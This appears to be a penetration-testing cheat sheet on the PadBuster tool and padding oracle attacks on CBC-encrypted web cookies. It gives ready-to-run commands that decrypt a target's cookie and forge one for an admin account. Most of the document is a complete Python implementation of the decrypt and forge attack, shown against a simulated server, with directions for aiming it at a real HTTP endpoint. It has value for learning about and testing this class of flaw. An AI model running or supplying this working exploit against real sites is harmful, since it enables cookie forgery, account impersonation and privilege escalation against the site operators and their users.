killchain-compendium/exploit/padding/padbuster.md

2022-03-19 23:39:17 +01:00
# PadBuster
* [AonCyberLabs' GitHub](https://github.com/AonCyberLabs/PadBuster.git)
* Automated padding oracle attack: decrypts CBC ciphertext and forges ciphertext for chosen plaintext without the key, using only the target's "valid/invalid padding" response
* Argument order: `padBuster.pl URL EncryptedSample BlockSize [options]`; the sample is Base64 by default (`-encoding` switches to hex etc.) and may be URL-encoded as it appears in the request
## Usage on Cookies
* Oracle on the cookie value: the encrypted cookie is the sample, `-cookies` sends it with every request, and the page's error message for invalid padding (passed via `-error`) tells PadBuster which guesses decrypt to valid padding
* Block size must match the cipher: 8 for DES/3DES/Blowfish, 16 for AES; try both if the sample length alone does not settle it
* With `-plaintext`, the same oracle forges a cookie for chosen content, e.g. the cookie of a higher-privileged account (admin) instead of the current user
```sh
# Decrypt mode: recover the plaintext of the cookie "hcon" (block size 8)
./padBuster.pl http://10.10.135.100/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "hcon=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "<website error>"
```

```sh
# Forge mode: build a cookie that decrypts to '<user>=<username>' (same oracle, same block size)
./padBuster.pl http://$TARGET_IP/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "session=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "<website error>" -plaintext '<user>=<username>'
```
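As an added worked example (not part of the original note and not PadBuster's own code), the following Python reproduces what the two commands above do against a simulated application: `decrypt_cookie` is the decrypt mode, `forge_cookie` is `-plaintext`. The block cipher is a constructed stand-in Feistel network rather than AES, because the attack never looks inside the cipher; it only needs CBC chaining and the yes/no padding check that `make_oracle` models (the equivalent of matching `-error`). The key, cookie contents and block size are constructed for the demo.

```python
import hashlib

BLOCK = 16

# Constructed stand-in block cipher (NOT AES): a 4-round keyed Feistel network
# with SHA-256 as the round function. Swapping in AES changes nothing below.
def _round(key: bytes, i: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, bytes(a ^ b for a, b in zip(l, _round(key, i, r)))
    return l + r

def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = bytes(a ^ b for a, b in zip(r, _round(key, i, l))), l
    return l + r

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

# PKCS#7 + CBC as the simulated application uses them for its cookie.
def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("invalid padding")   # the leak that -error matches on
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, xor(plaintext[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

# Server side: cookie = IV || ciphertext; reading it raises on bad padding.
def make_cookie(key: bytes, plaintext: bytes) -> bytes:
    iv = hashlib.sha256(b"demo-iv" + plaintext).digest()[:BLOCK]  # deterministic for the demo
    return iv + cbc_encrypt(key, iv, pkcs7_pad(plaintext))

def read_cookie(key: bytes, cookie: bytes) -> bytes:
    return pkcs7_unpad(cbc_decrypt(key, cookie[:BLOCK], cookie[BLOCK:]))

def make_oracle(key: bytes):
    """Attacker's view of the server: True = page rendered, False = padding error shown."""
    def oracle(cookie: bytes) -> bool:
        try:
            read_cookie(key, cookie)
            return True
        except ValueError:
            return False
    return oracle

# Attacker side: recover D_k(target) one byte at a time using only the oracle.
def recover_intermediate(oracle, target: bytes) -> bytes:
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ pad          # known bytes forced to the pad value
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:
                # 0x01 is accepted, but so is an accidental 0x02 0x02; perturb the
                # byte to the left and require the padding to stay valid.
                check = bytearray(forged)
                check[pos - 1] ^= 0xFF
                if not oracle(bytes(check) + target):
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("oracle accepted no guess; is it really a padding oracle?")
    return bytes(inter)

def decrypt_cookie(oracle, cookie: bytes) -> bytes:
    """Decrypt mode: plaintext block i = D_k(c_i) XOR c_(i-1), with c_0 = IV."""
    blocks = [cookie[i:i + BLOCK] for i in range(0, len(cookie), BLOCK)]
    plain = b"".join(xor(recover_intermediate(oracle, blocks[i]), blocks[i - 1])
                     for i in range(1, len(blocks)))
    return pkcs7_unpad(plain)

def forge_cookie(oracle, plaintext: bytes) -> bytes:
    """-plaintext mode: walk backwards from an arbitrary last block to build IV || ct."""
    padded = pkcs7_pad(plaintext)
    chain = [bytes(BLOCK)]                      # last ciphertext block can be anything
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        chain.insert(0, xor(recover_intermediate(oracle, chain[0]), padded[i:i + BLOCK]))
    return b"".join(chain)                      # chain[0] is the forged IV

DEMO_KEY = b"constructed-demo-key"             # never known to the attacker code

if __name__ == "__main__":
    oracle = make_oracle(DEMO_KEY)
    cookie = make_cookie(DEMO_KEY, b"user=alice;role=user")
    print(decrypt_cookie(oracle, cookie))
    print(read_cookie(DEMO_KEY, forge_cookie(oracle, b"user=admin;role=admin")))
```

The only thing the attacker functions touch is `oracle`; against a real target that function would send the candidate cookie in an HTTP request and return whether the `-error` string is absent from the response, which is exactly the loop PadBuster automates. The last-byte confirmation step matters in practice: without it, roughly one block in 256 is decrypted wrongly.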